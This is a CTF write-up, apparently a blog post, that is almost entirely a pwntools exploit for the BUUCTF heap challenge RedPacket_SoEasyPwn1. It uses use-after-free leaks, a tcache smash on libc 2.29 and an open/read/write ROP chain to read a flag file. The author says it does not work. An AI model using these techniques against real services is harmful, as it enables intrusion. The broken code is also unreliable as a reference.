思路
这题很奇怪，感觉没问题，也绕过了，但就是打不通，不知道问题在哪。
EXP
from pwn import *
#p = process("./RedPacket_SoEasyPwn1")
# Remote target exactly as posted in the writeup; the commented process()
# line above is the local alternative.
p = remote('node4.buuoj.cn',29013)
# context.log_level = 'debug'
# Local copies of the challenge binary and the libc it is paired with (2.29).
elf = ELF("./RedPacket_SoEasyPwn1")
libc = ELF('./libc-2.29.so')
# Thin wrappers around the pwntools tube. The *a variants wait for a prompt
# before sending; sa/sla coerce the payload with str() first.
s = lambda data :p.send(data)
sa = lambda text,data :p.sendafter(text, str(data))
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda text :p.recvuntil(text)
# Leak parsers: read until the marker byte ('\xf7' / '\x7f', 1 s timeout),
# keep the last 4 / 6 bytes, zero-pad to a word and unpack.
uu32 = lambda :u32(p.recvuntil("\xf7",timeout = 1)[-4:].ljust(4,"\x00"))
uu64 = lambda :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
# Log a labelled address in hex via the tube's success() logger.
lg = lambda name,data :p.success(name + "-> 0x%x" % data)
# NOTE(review): str and bytes are mixed throughout (str fill in ljust(),
# str + p64() concatenation) -- this assumes Python 2 pwntools semantics;
# under Python 3 those expressions raise TypeError.
def cmd(choice):
    """Pick a menu entry: send *choice* as a line once the 'Your input: ' prompt appears."""
    p.sendlineafter('Your input: ', str(choice))
def add(idx, size, content):
    """Menu option 1: create packet *idx* with size choice *size* and raw *content*.

    *size* is the menu's 1-4 selector (0x10 / 0xf0 / 0x300 / 0x400 per the
    prompt text); *content* is sent as-is, without a trailing newline.
    """
    cmd(1)
    p.sendlineafter('Please input the red packet idx: ', str(idx))
    p.sendlineafter('How much do you want?(1.0x10 2.0xf0 3.0x300 4.0x400): ', str(size))
    p.sendafter('Please input content: ', content)
def edit(idx, content):
    """Menu option 3: resend *content* for packet *idx* (raw send, no newline)."""
    cmd(3)
    p.sendlineafter('Please input the red packet idx: ', str(idx))
    p.sendafter('Please input content: ', content)
def delete(idx):
    """Menu option 2: delete packet *idx*."""
    cmd(2)
    p.sendlineafter('Please input the red packet idx: ', str(idx))
def show(idx):
    """Menu option 4: ask the service to show packet *idx*; the caller reads the reply."""
    cmd(4)
    p.sendlineafter('Please input the red packet idx: ', str(idx))
def dbg():
    """Attach gdb to the live tube and pause() until resumed (debug helper; not called below)."""
    gdb.attach(p)
    pause()
# Exploit chain exactly as posted. The note at the top says it does not land;
# it is left unchanged here and the comments only describe what each step
# visibly does.

# Six allocate/delete pairs using size choice 2 (0xf0 per the menu prompt).
for i in range (0,6):
    add(i,2,'a')
    delete(i)
# Eight packets of size choice 4 (0x400) plus one of choice 1 (0x10), then the
# eight are deleted again.
for i in range(0,8):
    add(i,4,'a')
add(8,1,'a')
for i in range(0,8):
    delete(i)
# show() on idx 6, which was deleted just above; the reply is taken as a 6-byte
# address and rebased by fixed constants. Showing an entry after deleting it
# only yields anything if the service keeps the stale pointer -- that
# use-after-free is what the chain relies on, and clearing the slot on delete
# is the hardening fix on the service side.
show(6)
heap_head = u64(p.recv(6).ljust(8,'\x00')) - 0x26c0 -0x600
lg('heap_head',heap_head)
# Same read on deleted idx 7; the constants are specific to the libc-2.29.so
# loaded above.
show(7)
libc_base = uu64() - 96 - 0x1E4C40
lg('libc_base',libc_base)
read_addr = libc.sym['read'] + libc_base
open_addr = libc.sym['open'] + libc_base
write_addr = libc.sym['write'] + libc_base
#tcache smash
# make background
#chunk1
add(3,3,'a')
#chunk2
add(1,4,'a')
add(2,4,'a')
delete(1)
add(4,3,'a')
add(5,3,'a')
#attack
# edit() on idx 1, which was deleted just above (second stale-pointer use):
# the payload is 0x300 filler bytes followed by a zero word, a 0x101 word and
# two heap-relative pointers.
edit(1,'a'*0x300 + p64(0) + p64(0x101) + p64(heap_head + 0x37e0) + p64(heap_head + 0x250 + 0x10 + 0x800 - 0x10))
add(6,2,'a')
# Gadget offsets hard-coded for this libc build.
pop_rdi_ret = 0x0000000000026542 + libc_base
pop_rsi_ret = 0x0000000000026f9e + libc_base
pop_rdx_ret = 0x000000000012bda6 + libc_base
leave_ret = 0x0000000000058373 + libc_base
# ROP chain as written: open(heap_head+0x4440, 0, 0), then
# read(3, heap_head+0x260, 0x100), then write(1, heap_head+0x260, 0x100).
shell = p64(pop_rdi_ret) + p64(heap_head + 0x004440) + p64(pop_rsi_ret) + p64(0) + p64(pop_rdx_ret)+ p64(0)
shell += p64(open_addr)
shell += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret)+p64(heap_head+0x260) + p64(pop_rdx_ret)+ p64(0x100)
shell += p64(read_addr)
shell += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret)+p64(heap_head+0x260) + p64(pop_rdx_ret)+ p64(0x100)
shell += p64(write_addr)
# "flag.txt" is stored in idx 7 and the chain in idx 8, both with size choice 4.
add(7,4,"flag.txt")
add(8,4,shell)
# Menu choice 666 lies outside the 1-4 used by the helpers above. Its prompt is
# answered with 0x80 bytes of padding, a heap address and the leave;ret gadget.
# NOTE(review): presumably meant to pivot into the heap buffer holding
# `shell` -- unverified here, and the author reports the chain fails.
cmd(666)
pl = 'a'*0x80 + p64(heap_head + 0x004840 + 8)+ p64(leave_ret)
p.recvuntil('What do you want to say?')
p.send(pl)
p.interactive()